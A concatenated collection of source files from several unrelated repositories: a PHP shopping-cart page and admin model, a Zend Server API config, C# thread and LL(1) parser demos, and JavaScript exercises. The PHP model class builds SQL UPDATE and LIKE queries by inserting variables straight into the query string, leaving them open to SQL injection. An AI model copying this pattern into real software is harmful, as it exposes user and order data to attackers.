<a class="cart_quantity_up" href="" onclick="TB_hethang()"> + </a>
<?php } ?>
<input class="cart_quantity_input" size="2" type="text" name="soluong" value="<?php echo $value['soluong']; ?>">
<a class="cart_quantity_down" href="?action=giohang&act=update_giohang_tru&id=<?= $value['idSP'] ?>"> - </a>
</div>
</span>
</td>
<td class="quantity">
<span>
<?php
if ($value['soluong_kho'] < 0) {
echo "Lỗi";
} else {
echo $value['soluong_kho'];
}
?></span>
</td>
<td class="subtotal">
<span><?= number_format($_SESSION['tongtien'] += $value['thanhtien']) ?></span>
</td>
<td class="remove-icon">
<a href="?action=giohang&act=xoagiohang&id=<?= $value['idSP'] ?>">
<img src="img/cart/btn_remove.png" alt="">
</a>
</td>
</tr>
<?php
$_SESSION['soluong'] = $soluong;
}
} ?>
</tbody>
</table>
</form>
<div class="shopping-button">
<div class="continue-shopping">
<button type="submit">continue shopping</button>
</div>
<div class="shopping-cart-left">
<button type="submit">Clear Shopping Cart</button>
<button type="submit">Update Shopping Cart</button>
</div>
</div>
</div>
</div>
</div>
<div class="row">
<div class="col-sm-4">
<div class="discount-code">
<h3>Discount Codes</h3>
<p>Enter your coupon code if you have one.</p>
<input type="text">
<div class="shopping-button">
<button type="submit">apply coupon</button>
</div>
</div>
</div>
<div class="col-sm-4">
<div class="estimate-shipping">
<h3>Estimate Shipping and Tax</h3>
<p>Enter your destination to get a shipping estimate.</p>
<form action="#">
<div class="form-box">
<div class="form-name">
<label> country <em>*</em> </label>
<select>
<option value="1">Afghanistan</option>
<option value="1">Algeria</option>
<option value="1">American Samoa</option>
<option value="1">Australia</option>
<option value="1">Bangladesh</option>
<option value="1">Belgium</option>
<option value="1">Bosnia and Herzegovina</option>
<option value="1">Chile</option>
<option value="1">China</option>
<option value="1">Egypt</option>
<option value="1">Finland</option>
<option value="1">France</option>
<option value="1">United State</option>
</select>
</div>
</div>
<div class="form-box">
<div class="form-name">
<label> State/Province </label>
<select>
<option value="1">Please select region, state or province</option>
<option value="1">Arizona</option>
<option value="1">Armed Forces Africa</option>
<option value="1">California</option>
<option value="1">Florida</option>
<option value="1">Indiana</option>
<option value="1">Marshall Islands</option>
<option value="1">Minnesota</option>
<option value="1">New Mexico</option>
<option value="1">Utah</option>
<option value="1">Virgin Islands</option>
<option value="1">West Virginia</option>
<option value="1">Wyoming</option>
</select>
</div>
</div>
<div class="form-box">
<div class="form-name">
<label> Zip/Postal Code </label>
<input type="text">
</div>
</div>
<div class="shopping-button">
<button type="submit">get a quote</button>
</div>
</form>
</div>
</div>
<div class="col-sm-4">
<div class="totals">
<p>subtotal <span>$1,540.00</span> </p>
<h3>Grand Total <span>$1,540.00</span></h3>
<div class="shopping-button">
<button type="submit">proceed to checkout</button>
</div>
<a href="#">Checkout with Multiple Addresses</a>
</div>
</div>
</div>
</div>
</div>
<!-- cart item area end --><file_sep>/admin/model_admin/trangchu.php
<?php
// MODEL CHO CÁC THÔNG TIN SẢN PHẨM
require_once('ketnoi.php');
/**
*
*/
class trangchu
{
var $conn;
function __construct()
{
$connect_obj = new ketnoi();
$this->conn = $connect_obj->connect;
}
function all_user()
{
$query = "SELECT * FROM user ORDER BY idUser";
$result = $this->conn->query($query);
$data = array();
while ($row = $result->fetch_assoc()) {
$data[] = $row;
}
return $data;
}
function all_sanpham()
{
$query = "SELECT * FROM sanpham ORDER BY idSP";
$result = $this->conn->query($query);
$data = array();
while ($row = $result->fetch_assoc()) {
$data[] = $row;
}
return $data;
}
function all_loaisanpham()
{
$query = "SELECT * FROM loaisanpham ORDER BY idLoaiSP";
$result = $this->conn->query($query);
$data = array();
while ($row = $result->fetch_assoc()) {
$data[] = $row;
}
return $data;
}
function all_hoadon()
{
$query = "SELECT * FROM hoadon ORDER BY idhoadon";
$result = $this->conn->query($query);
$data = array();
while ($row = $result->fetch_assoc()) {
$data[] = $row;
}
return $data;
}
function all_hoadon_day($ngaymua)
{
$query = "SELECT * FROM hoadon WHERE ngaymua LIKE '%$ngaymua%' && trangthai='1' ORDER BY idhoadon";
$result = $this->conn->query($query);
$data = array();
while ($row = $result->fetch_assoc()) {
$data[] = $row;
}
return $data;
}
function all_banner()
{
$query = "SELECT * FROM banner ORDER BY idbanner";
$result = $this->conn->query($query);
$data = array();
while ($row = $result->fetch_assoc()) {
$data[] = $row;
}
return $data;
}
function all_khuyenmai()
{
$query = "SELECT * FROM khuyenmai ORDER BY idKM";
$result = $this->conn->query($query);
$data = array();
while ($row = $result->fetch_assoc()) {
$data[] = $row;
}
return $data;
}
function all_layout()
{
$query = "SELECT * FROM layout";
$result = $this->conn->query($query);
$data = array();
while ($row = $result->fetch_assoc()) {
$data[] = $row;
}
return $data;
}
function update_layout($mail, $diachi, $phone)
{
$query = "UPDATE layout SET mail='$mail', diachi='$diachi', phone='$phone' WHERE id = '1'";
$result = $this->conn->query($query);
if($result == true){
header('Location: ?action=trangchu');
}
}
}
?>
|
f90ebf154ba3f0e2c8edb2f3ff43936d3016ee83
|
[
"SQL",
"PHP"
] | 64
|
PHP
|
hieuthanh1999/StoreHongAn
|
0d6ca45b212e12ecb9a45642348c9e97a7884c03
|
2fe9dc9e78eef4f5813c74952361de09485d19d9
|
refs/heads/master
|
<repo_name>swilczynski/ZendServerWebApiModule<file_sep>/config/api/version-1.9.config.php
<?php
return array(
'min-zsversion' => '8.0',
'console' => array(
'router' => array(
'routes' => array(
'apmGetUrls' => array(
'options' => array(
'route' => 'apmGetUrls [--limit=] [--offset=] [--applicationId=] [--filter=] [--period=]',
'defaults' => array(
'controller' => 'webapi-api-controller',
'action' => 'apmGetUrls',
'apiMethod' => 'get'
),
'group' => 'apm',
'info' => array(
'Get a list of URL statistics.',
array('--limit', 'The number of rows to retrieve. Default lists all rules up to an arbitrary limit set by the system.'),
array('--offset', 'A paging offset to begin the list from. Default: 0'),
array('--applicationId', 'Display URLs of a specific application. If not supplied, display URLs from all the applications.'),
array('--filter', 'Predefined filters/order
1 - “most time consuming” - order by number of samples multiply average time, descending.
2 - “slowest response time” - order by average time, descending.
3 - “most visited” - ordered by number of sample,s descending.
If not supplied, default is 1.'),
array('--period', 'Period in hours (one week is 24*7, etc.). Default is 24.'),
)
)
),
'apmGetUrlInfo' => array(
'options' => array(
'route' => 'apmGetUrlInfo --id= [--order=] [--period=]',
'defaults' => array(
'controller' => 'webapi-api-controller',
'action' => 'apmGetUrlInfo',
'apiMethod' => 'get'
),
'group' => 'apm',
'info' => array(
'Get a single request statistics info with its requests. The requests can be filtered and ordered using \'period\' and \'order\' parameter',
array('--id', 'The URL ID to retrieve the info from.'),
array('--order', 'The order of the requests list. The format is like in \'order\' clause in SQL, e.g. \'from_time desc\' or \'until_time\'.'),
array('--period', 'Number of hours. Limits the requests list to a specific period - \'period\' hours back until now. Default is 24 (i.e. by default bring requests from the last 24 hours).'),
)
)
),
'zrayGetAllRequestsInfo' => array(
'options' => array(
'route' => 'zrayGetAllRequestsInfo [--from_timestamp=] [--limit=] [--offset=]',
'defaults' => array(
'controller' => 'webapi-api-controller',
'action' => 'zrayGetAllRequestsInfo',
'apiMethod' => 'get'
),
'group' => 'zray',
'info' => array(
'Get a list of requests starting from a specific timestamp (same as `zrayGetRequestsInfo` but not by pageID). The API receives 3 parameters - `from_timestamp`, `limit` and `offset`. The default limit is 10.',
array('--from_timestamp', 'Specify the timestamp to get all the requests that came after (microseconds - 13 digits).'),
array('--limit', 'Limit number of requests. Default is 10. Max value is 500.'),
array('--offset', 'Get data starting from a specific offset. Default is 0.'),
)
)
),
'zrayGetCustomData' => array(
'options' => array(
'route' => 'zrayGetCustomData --requestId=',
'defaults' => array(
'controller' => 'webapi-api-controller',
'action' => 'zrayGetCustomData',
'apiMethod' => 'get'
),
'group' => 'zray',
'info' => array(
'Get all custom data stored for the current request. Custom data is collected using the ZRayExtension class API and is stored with the official data collected by ZRay’s default operations. Custom data can be formatted in any way the extension is designed to hold. This may mean an unusually large payload.',
array('--requestId', 'The request ID of the environment information to retrieve.'),
)
)
),
)
)
)
);
|
63a67a62cf8c56507f763b5866440098cf36be26
|
[
"PHP"
] | 1
|
PHP
|
swilczynski/ZendServerWebApiModule
|
46636ebc18ecf39401f82c7d6da2b474b4082e45
|
b0d2bb053e8b11cc7b6f72819f5d1e87684cb986
|
refs/heads/master
|
<file_sep>using System;
using System.Threading;
using System.Windows;
using System.Windows.Controls;
namespace Hilos
{
/// <summary>
/// Lógica de interacción para MainWindow.xaml
/// </summary>
public partial class MainWindow : Window
{
public delegate void actualizarIU(TextBlock textBlock, string contador);
private int contador = 0;
public MainWindow()
{
InitializeComponent();
}
private void ContadorAutomatico()
{
for (int i = 1; i < 11; i++)
{
textBlockAutomatico.Dispatcher.Invoke(new Action(() =>
{
textBlockAutomatico.Text = i.ToString();
}));
Thread.Sleep(1000);
}
}
private void ContadorAutomaticoConHilo(object sender, RoutedEventArgs e)
{
textBlockAutomatico.Text = "0";
textBlockManual.Text = "0";
Thread hilo = new Thread(ContadorAutomatico);
hilo.Start();
}
private void ContadorManual(object sender, RoutedEventArgs e)
{
contador++;
textBlockManual.Text = contador.ToString();
}
private void ContadorAutomaticoSinHilo()
{
textBlockAutomatico.Text = "0";
textBlockManual.Text = "0";
for (int i = 1; i < 11; i++)
{
textBlockAutomatico.Text = i.ToString();
Thread.Sleep(1000);
}
}
private void ContadorSinHilo(object sender, RoutedEventArgs e)
{
contador = 0;
ContadorAutomaticoSinHilo();
}
}
}
|
f30b102dedc306a8b6f5d392ac3fa032ac2faa71
|
[
"C#"
] | 1
|
C#
|
BaezCrdrmUV/contador-hilos-bet160
|
ef58a99991506e08ed11b7566924eb50ea802198
|
efab493309e46e67caca276e3c0412b47d95c339
|
refs/heads/master
|
<repo_name>tianqy/ll1_syntax_analysis<file_sep>/README.md
# ll1_syntax_analysis
LL1型语法分析程序(c#)
该项目由c#语言开发,基于winform实现了界面操作。设计界面无控件,控件全部在代码中完成,所以界面都能完好还原,移植方便。
此程序在固定文法和分析表的基础上完成分析功能,要求操作的时先输入符号串,选择开始分析后进行语法分析。
<file_sep>/LL1/Process.cs
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace LL1
{
class Process
{
private int index;
private string symbolStack;
private string inputString;
private string production;
public int Index
{
get { return index; }
set { index = value; }
}
public string SymbolStack
{
get { return symbolStack; }
set { symbolStack = value; }
}
public string InputString
{
get { return inputString; }
set { inputString = value; }
}
public string Production
{
get { return production; }
set { production = value; }
}
}
}
<file_sep>/LL1/Form1.cs
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Windows.Forms;
namespace LL1
{
public partial class Form1 : Form
{
Label lblTitle;
Label lblGrammer;
RichTextBox rtbGrammer;
Label lblAnalysisTable;
DataGridView dgvAnalysis;
Label lblSymbolString;
TextBox tbSymbolString;
Button btnAnalysis;
Label lblResult;
DataGridView dgvResult;
Label lblwarn;
string symbolString=""; //输入串
List<Process> processList = new List<Process>();
public Form1()
{
InitializeComponent();
initForm(); //初始化界面控件
initData(); //初始化数据
btnAnalysis.Click += new EventHandler(analysis); //设置点击事件
}
//button点击事件,开始执行分析
private void analysis(object sender, EventArgs e)
{
symbolString = tbSymbolString.Text.ToString();
if (symbolString != "")
{
if (symbolString.ElementAt(symbolString.Length-1) != '#')
{
symbolString += "#";
}
}
else
{
MessageBox.Show("请先输入符号串");
return;
}
processList.Clear();
dgvResult.DataSource = null;
//结果集DataGridView创建
dgvResult.Location = new Point(470, 195);
this.Controls.Add(dgvResult);
//DataGridView属性
dgvResult.Font = new Font("Consolas", 8, dgvAnalysis.Font.Style);
dgvResult.RowHeadersVisible = false;
Process process1 = new Process();
process1.Index = 1;
process1.SymbolStack = "#S";
process1.InputString = symbolString;
process1.Production = "S->A";
processList.Add(process1);
string stack_symbol = "#S";
string input_str = symbolString;
string production = "S->A";
for (int i = 2; ; i++)
{
//得到新的符号栈stack_symbol
if (production == "")
{
//判断符号栈最末元素和输入串的初始元素是否相等,相等则规约,否则报错
if (stack_symbol[stack_symbol.Length - 1] == input_str[0])
{
stack_symbol = stack_symbol.Substring(0, stack_symbol.Length - 1);
input_str = input_str.Substring(1);
}
else
{
MessageBox.Show("查找失败");
showWarn(false);
}
}
else
{
if (stack_symbol[stack_symbol.Length - 1] != '\'')
{
stack_symbol = stack_symbol.Substring(0, stack_symbol.Length - 1);
}
else stack_symbol = stack_symbol.Substring(0, stack_symbol.Length - 2);
string[] pro = production.Split('>');
stack_symbol += prod2symbol(pro[1]);
}
string symboltmp="";
if(stack_symbol[stack_symbol.Length-1]!='\''){
symboltmp+=stack_symbol[stack_symbol.Length-1];
} else symboltmp=stack_symbol[stack_symbol.Length-2]+""
+stack_symbol[stack_symbol.Length-1];
string inputStrtmp="";
inputStrtmp+=input_str[0];
if (symboltmp == "#" && inputStrtmp == "#")
{
production = "OK";
Process process = new Process();
process.Index = i;
process.SymbolStack = stack_symbol;
process.InputString = input_str;
process.Production = production;
processList.Add(process);
showWarn(true);
break;
}
else if (symboltmp == inputStrtmp)
{
production = "";
Process process = new Process();
process.Index = i;
process.SymbolStack = stack_symbol;
process.InputString = input_str;
process.Production = production;
processList.Add(process);
}
else
{
int r = 0, c = 0;
for (int row = 0; row <= 5; row++)
{
if (dgvAnalysis.Rows[row].Cells[0].Value.ToString().Equals(symboltmp))
{
r = row;
break;
}
}
for (int col = 1; col <= 6; col++)
{
if (dgvAnalysis.Columns[col].HeaderText.Equals(inputStrtmp))
{
c = col;
break;
}
}
if (r == 5 && c == 6)
{
MessageBox.Show("查找失败!");
showWarn(false);
break;
}
else
{
production = dgvAnalysis.Rows[r].Cells[c].Value.ToString();
if (production != "error")
{
Process process = new Process();
process.Index = i;
process.SymbolStack = stack_symbol;
process.InputString = input_str;
process.Production = production;
processList.Add(process);
}
else
{
Process process = new Process();
process.Index = i;
process.SymbolStack = stack_symbol;
process.InputString = input_str;
process.Production = "error!";
processList.Add(process);
MessageBox.Show("匹配失败");
showWarn(false);
break;
}
}
}
}
if (processList.Count < 10)
{
int high = 24 * (processList.Count + 1)-processList.Count/2-1;
dgvResult.Size = new Size(404, high);
}
else dgvResult.Size = new Size(420, 230);
this.dgvResult.AllowUserToAddRows = false;
this.dgvResult.DataSource = processList;
dgvResult.Columns[0].HeaderText = "步骤";
dgvResult.Columns[1].HeaderText = "符号栈S[i]";
dgvResult.Columns[2].HeaderText = "输入串str[j]";
dgvResult.Columns[3].HeaderText = "产生式";
dgvResult.Columns[2].DefaultCellStyle.Alignment = DataGridViewContentAlignment.MiddleRight;
}
private string prod2symbol(string p)
{
string stmp="";
int len = p.Length;
for (int i = len-1; i >=0; i--)
{
if (p[i] == '\'')
{
stmp = stmp + p[i - 1] + p[i];
i--;
}
else if(p[i] != 'Ɛ')
{
stmp += p[i];
}
}
return stmp;
}
//窗体初始化
void initForm()
{
this.BackColor = Color.FromArgb(0xee, 0xf7, 0xff);
lblTitle = new Label();
lblTitle.Size = new Size(175, 25);
lblTitle.Location = new Point(270, 8);
//lblTitle.Left = (this.ClientRectangle.Width - lblTitle.Width) / 2;
//lblTitle.BringToFront();
this.Controls.Add(lblTitle);
lblGrammer = new Label();
lblGrammer.Location = new Point(12, 36);
lblGrammer.Size = new Size(40, 16);
this.Controls.Add(lblGrammer);
rtbGrammer = new RichTextBox();
rtbGrammer.Location = new Point(12, 52);
rtbGrammer.Size = new Size(200, 150);
rtbGrammer.BackColor = Color.White;
rtbGrammer.ReadOnly = true;
this.Controls.Add(rtbGrammer);
lblAnalysisTable = new Label();
lblAnalysisTable.Location = new Point(12, 210);
lblAnalysisTable.Size = new Size(56, 16);
this.Controls.Add(lblAnalysisTable);
dgvAnalysis = new DataGridView();
dgvAnalysis.Location = new Point(12, 226);
dgvAnalysis.Size = new Size(300, 140);
this.Controls.Add(dgvAnalysis);
lblSymbolString = new Label();
lblSymbolString.Location = new Point(350, 36);
lblSymbolString.Size = new Size(200, 16);
this.Controls.Add(lblSymbolString);
tbSymbolString = new TextBox();
tbSymbolString.Location = new Point(350, 52);
tbSymbolString.Size = new Size(250, 16);
this.Controls.Add(tbSymbolString);
btnAnalysis = new Button();
btnAnalysis.Location = new Point(350, 90);
btnAnalysis.Size = new Size(80, 24);
btnAnalysis.BackColor = Color.White;
btnAnalysis.ForeColor = Color.FromArgb(0x44, 0xaa, 0xff);
this.Controls.Add(btnAnalysis);
lblResult = new Label();
lblResult.Location = new Point(350, 130);
lblResult.Size = new Size(100, 16);
this.Controls.Add(lblResult);
dgvResult = new DataGridView();
lblwarn = new Label();
lblwarn.Size = new Size(60, 16);
lblwarn.Location = new Point(470, 430);
}
//数据初始化
void initData()
{
lblTitle.Font = new Font("Consolas", 18);
lblTitle.Text = "LL(1)语法分析程序";
this.Font = new Font("宋体", 12);
lblGrammer.Text = "文法";
rtbGrammer.Font = new Font("Consolas", 10, rtbGrammer.Font.Style);
rtbGrammer.Text = "S->A\r\nA->BA'\r\nA'->iBA'|Ɛ\r\nB->CB'\r\nB'->+CB'|Ɛ\r\nC->)A*|(";
lblAnalysisTable.Text = "分析表";
dgvAnalysis.ColumnHeadersDefaultCellStyle.Font = new Font("Consolas", 8, dgvAnalysis.Font.Style);
dgvAnalysis.RowsDefaultCellStyle.Font = new Font("Consolas", 8, dgvAnalysis.Font.Style);
DataTable dt = new DataTable();
dt.Columns.Add(new DataColumn("(非)终结符", typeof(string)));
dt.Columns.Add(new DataColumn("i", typeof(string)));
dt.Columns.Add(new DataColumn("+", typeof(string)));
dt.Columns.Add(new DataColumn("*", typeof(string)));
dt.Columns.Add(new DataColumn("(", typeof(string)));
dt.Columns.Add(new DataColumn(")", typeof(string)));
dt.Columns.Add(new DataColumn("#", typeof(string)));
DataRow dr;//行
dr = dt.NewRow();
dr[0] = "S";
dr[1] = "error";
dr[2] = "error";
dr[3] = "error";
dr[4] = "S->A";
dr[5] = "S->A'";
dr[6] = "error";
dt.Rows.Add(dr);
dr = dt.NewRow();
dr[0] = "A";
dr[1] = "error";
dr[2] = "error";
dr[3] = "error";
dr[4] = "A->BA'";
dr[5] = "A->BA'";
dr[6] = "error";
dt.Rows.Add(dr);
dr = dt.NewRow();
dr[0] = "A'";
dr[1] = "A'->iBA'";
dr[2] = "error";
dr[3] = "A'->Ɛ";
dr[4] = "error";
dr[5] = "error";
dr[6] = "A'->Ɛ";
dt.Rows.Add(dr);
dr = dt.NewRow();
dr[0] = "B";
dr[1] = "error";
dr[2] = "error";
dr[3] = "error";
dr[4] = "B->CB'";
dr[5] = "B->CB'";
dr[6] = "error";
dt.Rows.Add(dr);
dr = dt.NewRow();
dr[0] = "B'";
dr[1] = "B'->Ɛ";
dr[2] = "B'->+CB'";
dr[3] = "B'->Ɛ";
dr[4] = "error";
dr[5] = "error";
dr[6] = "B'->Ɛ";
dt.Rows.Add(dr);
dr = dt.NewRow();
dr[0] = "C";
dr[1] = "error";
dr[2] = "error";
dr[3] = "error";
dr[4] = "C->(";
dr[5] = "C->(A*";
dr[6] = "error";
dt.Rows.Add(dr);
dgvAnalysis.DataSource = dt;
dgvAnalysis.Columns[0].Width = 55;
dgvAnalysis.Columns[0].SortMode = DataGridViewColumnSortMode.NotSortable;
for (int i = 1; i < 7; i++)
{
dgvAnalysis.Columns[i].Width = 57;
dgvAnalysis.Columns[i].SortMode = DataGridViewColumnSortMode.NotSortable;
}
dgvAnalysis.RowHeadersVisible = false;
dgvAnalysis.RowTemplate.Height = 25;
dgvAnalysis.ColumnHeadersHeight = 35;
dgvAnalysis.RowHeadersWidth = 50;
dgvAnalysis.DefaultCellStyle.Alignment = DataGridViewContentAlignment.MiddleCenter;
dgvAnalysis.ColumnHeadersDefaultCellStyle.Alignment = DataGridViewContentAlignment.MiddleCenter;
this.dgvAnalysis.AllowUserToAddRows = false;
dgvAnalysis.ReadOnly = true;
lblSymbolString.Text = "请输入要分析的符号串,以#结束";
btnAnalysis.Font = new Font(btnAnalysis.Font, FontStyle.Bold);
btnAnalysis.Text = "开始分析";
lblResult.Text = "分析结果:";
}
//提示查找失败label
void showWarn(bool b){
if (b)
{
lblwarn.Text = "成功!";
lblwarn.ForeColor = Color.Green;
}
else
{
lblwarn.Text = "失败!";
lblwarn.ForeColor = Color.Red;
}
this.Controls.Add(lblwarn);
}
}
}
|
9e042b8a39a3ec5e026e92f9851ff3d39155924b
|
[
"Markdown",
"C#"
] | 3
|
Markdown
|
tianqy/ll1_syntax_analysis
|
8c8e3b9aaf7618632aa923333fbd6c5dca240856
|
f710cfad6bc9071134a32005555264fc4d3608f3
|
refs/heads/master
|
<file_sep>let display = document.getElementById("display");
let gradeHigher3 = document.getElementById("gradeHigher3");
let femaleWithGrade5 = document.getElementById("femaleWithGrade5");
let maleSkoje18 = document.getElementById("maleSkoje18");
let femaleOver24 = document.getElementById("femaleOver24");
let maleOver2StartsB = document.getElementById("maleOver2StartsB");
fetch("https://raw.githubusercontent.com/sedc-codecademy/skwd9-04-ajs/main/Samples/students_v2.json")
.then(function(response){
return response.json();
}).then(function(response){
gradeHigher3.addEventListener('click',function(){
displayResults(studentsWithAverageHigherThan3(response), display, gradeHigher3);
});
femaleWithGrade5.addEventListener('click',function(){
displayResults(femaleStudentsWithAverage5(response), display, femaleWithGrade5);
});
maleSkoje18.addEventListener('click',function(){
displayResults(maleWhoLiveInSkopjeOver18(response), display, maleSkoje18);
});
femaleOver24.addEventListener('click',function(){
displayResults(averageGradeOfFemalesOver24(response), display, femaleOver24);
});
maleOver2StartsB.addEventListener('click',function(){
displayResults(maleWithNameBAndGradeOver2(response), display, maleOver2StartsB);
});
});
function studentsWithAverageHigherThan3(students){
let averageGradeHigherThan3 = students
.filter(student=> student.averageGrade>3)
.map((student,index) => `${index+1}. ${student.firstName} ${student.lastName}`);
return averageGradeHigherThan3;
}
function femaleStudentsWithAverage5(students){
let femaleWhithAverage5 = students
.filter(student=> student.gender.toLowerCase() === 'female' && student.averageGrade === 5)
.map((student, index)=> `${index+1}, ${student.firstName} ${student.lastName}`);
return femaleWhithAverage5;
}
function maleWhoLiveInSkopjeOver18(students){
let skopjeMalesOver18 = students
.filter(student=> student.gender.toLowerCase() === 'male' && student.city.toLowerCase() === 'skopje' && student.age > 18)
.map((student, index)=> `${index+1}. ${student.firstName} ${student.lastName}`);
return skopjeMalesOver18;
}
function averageGradeOfFemalesOver24(students){
let femalesOver24Grades = students
.filter(student=> student.gender.toLowerCase() === 'female' && student.age > 24)
.map((student, index)=> `${index+1}. ${student.firstName} ${student.lastName} - Average Grade: ${student.averageGrade}`);
return femalesOver24Grades;
}
function maleWithNameBAndGradeOver2(students){
let malesThatStartWithBGradeOver2 = students
.filter(student=> student.gender.toLowerCase() === 'male' && student.averageGrade>2 && student.firstName[0] === 'B')
.map((student, index)=> `${index+1}. ${student.firstName} ${student.lastName}`);
return malesThatStartWithBGradeOver2;
}
function displayResults(students, display, btn){
display.innerHTML = "";
display.innerHTML += `
<b>${btn.innerText} :</b>
<ul>`;
students.forEach(student => display.innerHTML+= `<li style="list-style-type: none;">${student}</li>`);
}
<file_sep>let calculatorInput = $("#calculatorInput");
let btn = $("#btn");
let display = $("#display");
//FUNCTIONS
function checkNumberValue(number){
temp = '';
switch (number) {
case 1:
temp = 'one';
break;
case 2:
temp = 'two';
break;
case 3:
temp = 'three';
break;
case 4:
temp = 'four';
break;
case 5:
temp = 'five';
break;
case 6:
temp = 'six';
break;
case 7:
temp = 'seven';
break;
case 8:
temp = 'eight';
break;
case 9:
temp = 'nine';
break;
case 10:
temp = 'ten';
break;
case 11:
temp = 'eleven';
break;
case 12:
temp = 'twelve';
break;
case 13:
temp = 'thirteen';
break;
case 14:
temp = 'fourteen';
break;
case 15:
temp = 'fifteen';
break;
case 16:
temp = 'sixteen';
break;
case 17:
temp = 'seventeen';
break;
case 18:
temp = 'eighteen';
break;
case 19:
temp = 'nineteen';
break;
case 20:
temp = 'twenty';
break;
case 30:
temp = 'thirty';
break;
case 40:
temp = 'fourty';
break;
case 50:
temp = 'fifty';
break;
case 60:
temp = 'sixty';
break;
case 70:
temp = 'seventy';
break;
case 80:
temp = 'eighty';
break;
case 90:
temp = 'ninety';
break;
default:
temp = ' '
break;
}
return temp;
}//Finds the name
function separateDigits(number){
let array = [];
for(const digit of number){
array.push(parseInt(digit));
}
return array;
}//Returns an array with all the digits of a number
function lengthOne(display,number){
display.append(`${checkNumberValue(parseInt(number))}`);
}//One Digit Number
function lengthTwo(display,number){
if(number[0]>=2){
let temp = separateDigits(number);
temp[0]*=10;
if(temp[1] !== 0){
display.append(`
${checkNumberValue(temp[0])}-${checkNumberValue(temp[1])}`);
}else{
display.append(`${checkNumberValue(temp[0])}`);
}
}else{
number[0]*=10;
number[0]+=number[1];
lengthOne(display,number);
}
}//Two Digits Number
function lengthThree(display, number){
if(number[0] === 0){
number.splice(0,1);
lengthTwo(display, number);
}else{
let temp = separateDigits(number);
display.append(`${checkNumberValue(temp[0])} hundred `);
temp.splice(0,1);
lengthTwo(display, temp);
}
}//Hundred
function lengthFourFiveSix (display, number){
if(number[0] === 0){
number.splice(0,1);
if(number.length<=3){
lengthThree(display, number)
}else{
lengthFourFiveSix(display, number);
}
}else{
let temp = separateDigits(number);
switch (number.length) {
case 4:
display.append(`${checkNumberValue(temp[0])} thousand `);
temp.splice(0,1);
lengthThree(display, temp);
break;
case 5:
let twoDigits = [temp[0], temp[1]];
lengthTwo(display,twoDigits);
temp.splice(0,2);
display.append(` thousand `);
lengthThree(display, temp);
break;
case 6:
let threeDigits = [temp[0], temp[1], temp[2]];
lengthThree(display,threeDigits);
temp.splice(0,3);
display.append(` thousand `);
lengthThree(display,temp);
break;
default:
display.append('');
break;
}
}
}//Thousand
function lengthSevenEightNine(display, number){
if(number[0] === 0){
number.splice(0,1);
if(number.length<=3){
lengthThree(display, number)
}else if(number.length<=6){
lengthFourFiveSix(display, number);
}else{
lengthSevenEightNine(display,number);
}
}else{
let temp = separateDigits(number);
switch (number.length) {
case 7:
display.append(`${checkNumberValue(temp[0])} milion `);
temp.splice(0,1);
lengthFourFiveSix(display,temp);
break;
case 8:
let twoDigits = [temp[0], temp[1]];
lengthTwo(display, twoDigits);
temp.splice(0,2);
display.append(` milion `);
lengthFourFiveSix(display, temp);
break;
case 9:
let threeDigits = [temp[0], temp[1], temp[2]];
lengthThree(display, threeDigits);
temp.splice(0,3);
display.append(` milion `);
lengthFourFiveSix(display, temp);
break;
default:
display.append('');
break;
}
}
}//Milion
function lengthTenElevenTwelve(display, number){
if(number[0] === 0){
number.splice(0,1);
if(number.length<=3){
lengthThree(display, number)
}else if(number.length<=6){
lengthFourFiveSix(display, number);
}else if(number.length<=9){
lengthSevenEightNine(display,number);
}else{
lengthTenElevenTwelve(display,number);
}
}else{
let temp = separateDigits(number);
switch (number.length) {
case 10:
display.append(`${checkNumberValue(temp[0])} bilion `);
temp.splice(0,1);
lengthSevenEightNine(display,temp);
break;
case 11:
let twoDigits = [temp[0], temp[1]];
lengthTwo(display, twoDigits);
temp.splice(0,2);
display.append(` bilion `);
lengthSevenEightNine(display, temp);
break;
case 12:
let threeDigits = [temp[0], temp[1], temp[2]];
lengthThree(display, threeDigits);
temp.splice(0,3);
display.append(` bilion `);
lengthSevenEightNine(display, temp);
break;
default:
display.append('');
break;
}
}
}//Bilion
function lengthThirteenFourteenFifteen(display, number){
if(number[0] === 0){
number.splice(0,1);
if(number.length<=3){
lengthThree(display, number)
}else if(number.length<=6){
lengthFourFiveSix(display, number);
}else if(number.length<=9){
lengthSevenEightNine(display,number);
}else if(number.length<=12){
lengthTenElevenTwelve(display,number);
}else{
lengthThirteenFourteenFifteen(display, number);
}
}else{
let temp = separateDigits(number);
switch (number.length) {
case 13:
display.append(`${checkNumberValue(temp[0])} trilion `);
temp.splice(0,1);
lengthTenElevenTwelve(display,temp);
break;
case 14:
let twoDigits = [temp[0], temp[1]];
lengthTwo(display, twoDigits);
temp.splice(0,2);
display.append(` trilion `);
lengthTenElevenTwelve(display, temp);
break;
case 15:
let threeDigits = [temp[0], temp[1], temp[2]];
lengthThree(display, threeDigits);
temp.splice(0,3);
display.append(` trilion `);
lengthTenElevenTwelve(display, temp);
break;
default:
display.append('');
break;
}
}
}//Trilion
function findRange(display, number){
if(number<0){
display.css("color", "#b85454")
//display.append('The number is negative');
}else if(parseInt(number) === 0){
display.append('zero');
}else if(number.length === 1){
lengthOne(display, number);
}else if(number.length === 2){
lengthTwo(display, number);
}else if(number.length === 3){
lengthThree(display, number)
}else if(number.length<=6 && number.length>=4){
lengthFourFiveSix(display, number);
}else if(number.length<=9 && number.length>=7){
lengthSevenEightNine(display, number);
}else if(number.length<=12 && number.length>=10){
lengthTenElevenTwelve(display, number);
}else if(number.length<=15 && number.length>=13){
lengthThirteenFourteenFifteen(display,number);
}else{
display.css("color", "#b85454");
display.append('The number is bigger than 999 999 999 999 999 (999+ trilion), or the input is not a valid number!');
}
}//Finds The Range Ands Prints Results
//EVENT LISTENERS
$(document).ready(function(){
$("#note").html(`<p>NUMBER TO WORDS CONVERTER<br>
*You can use only positive numbers, up to 999 trilion*</p>`)
})
btn.click(function(){
display.html("");
display.css("color", "#89939e");
findRange(display,calculatorInput.val());
})<file_sep>let navService = {
navItems: document.getElementsByClassName("nav-item"),
navSearch: document.getElementById("citySearchInput"),
searchBtn: document.getElementById("citySearchBtn"),
pages: document.getElementById("pages").children,
previousBtn: document.getElementById("previousBtn"),
nextBtn: document.getElementById("nextBtn"),
sortWindSpeed: document.getElementById("sortWindSpeed"),
month: new Date().getMonth(),
minutes: new Date().getMinutes(),
counterMinute: 0,
counterMonth: 0,
activateItem: function(item){
for(let navItem of this.navItems){
